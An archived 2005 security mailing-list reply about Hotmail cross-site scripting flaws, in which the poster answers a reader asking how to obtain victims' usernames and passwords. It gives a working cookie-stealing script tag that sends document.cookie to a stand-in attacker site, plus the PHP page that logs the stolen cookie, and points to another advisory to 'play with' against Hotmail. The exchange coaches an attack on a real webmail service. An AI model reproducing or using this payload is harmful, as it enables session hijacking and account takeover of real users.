| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <003701c550a6$901c63a0$0301a8c0@tipi>
Date: Wed May 4 13:47:00 2005
From: jerome.athias at free.fr (Jerome Athias)
Subject: Re: [VulnWatch] Hotmail Advisories
> Ok I think I get what you are saying, however to use this vuln, would
> need to have a script running on a server some where that recieves the
> username and password?
>
> Or just based on what you have here this can be possible. If one does not
> have knowledge of java script, all the would have to do is use those
> various html codes you wrote and send that to them as an attachment, but
> how would I get the username and password ????
For example, this is a simple way to steal a cookie:
Inject this code:
<script>window.open('http://www.your-malware-website.com/givemecook.php?cook='%2Bdocument.cookie);</script>
And on "your-malware-website" put this page:
givemecook.php:
<?
echo $HTTP_COOKIE_VARS["cook"];
?>
and so, the cookie will be logged in "your-malware-website"
>> I was testing this until I can get some working code, the authorization
>> and
>> validation of the site is one of the better that I seen on a mailing
>> system,
>> I never heard about vulnerabilities of hotmail as in others systems, I
>> just
>> have knowledge of two flaws discovered. One on 1999 is from George
>> Guninski,
>> and the other when the pwdreset function make its public, every year
>> hotmail
>> is updated, and getting more secure, and it's hard to believe that no one
>> have found this before.
Try to play with this in hotmail
http://seclists.org/lists/bugtraq/2005/Feb/0473.html
Cheers,
Jerome
Powered by blists - more mailing lists